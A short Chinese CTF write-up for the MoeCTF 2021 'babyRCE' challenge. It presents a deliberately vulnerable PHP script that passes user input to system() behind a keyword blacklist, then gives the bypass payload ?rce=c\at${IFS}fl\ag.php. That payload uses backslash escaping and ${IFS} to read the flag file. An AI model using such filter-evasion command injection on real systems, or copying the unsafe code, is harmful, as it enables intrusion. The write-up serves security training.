[MoeCTF 2021]babyRCE

打开题目在线环境可以看到:

php 复制代码
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

这个代码审计起来就比较简单了,这里ls没有过滤可以直接用ls命令查看**?rce=ls**

查看flag.php就能获得flag。 cat过滤 ==> c\at绕过 (可以在linux系统测试,是可以的) 空格过滤 ==>

${IFS}绕过 flag过滤 ==> fl\ag

最后的payload就是:?rce=c\at${IFS}fl\ag.php

相关推荐
车载测试工程师3 小时前
车载以太网网络测试-29【SOME/IP-SD】-SD状态机
网络·网络协议·tcp/ip·车载系统·php
还鮟13 小时前
CTF Web PHP弱类型与进制绕过(过滤)
php·ctf
zorro_z13 小时前
PHP语法基础篇(八):超全局变量
php
九分源码1 天前
基于PHP+MySQL组合开发开源问答网站平台源码系统 源码开源可二次开发 含完整的搭建指南
mysql·开源·php
RainSerein1 天前
Laravel8中使用phpword生成word文档
word·php·laravel
pltrue1 天前
Go 重构案例分享:订单创建逻辑重构
go·php
RainSerein1 天前
Laravel8中调取腾讯云文字识别OCR
ocr·php·腾讯云·laravel
杰哥技术分享1 天前
PHP Yii2 安装SQL Server扩展-MAC M4 Pro芯片
开发语言·php
wuk99811 天前
深入理解PHP中的生成器(Generators)
开发语言·php
A5资源网11 天前
为WordPress 网站创建一个纯文本网站地图(Sitemap)
前端·数据仓库·html·php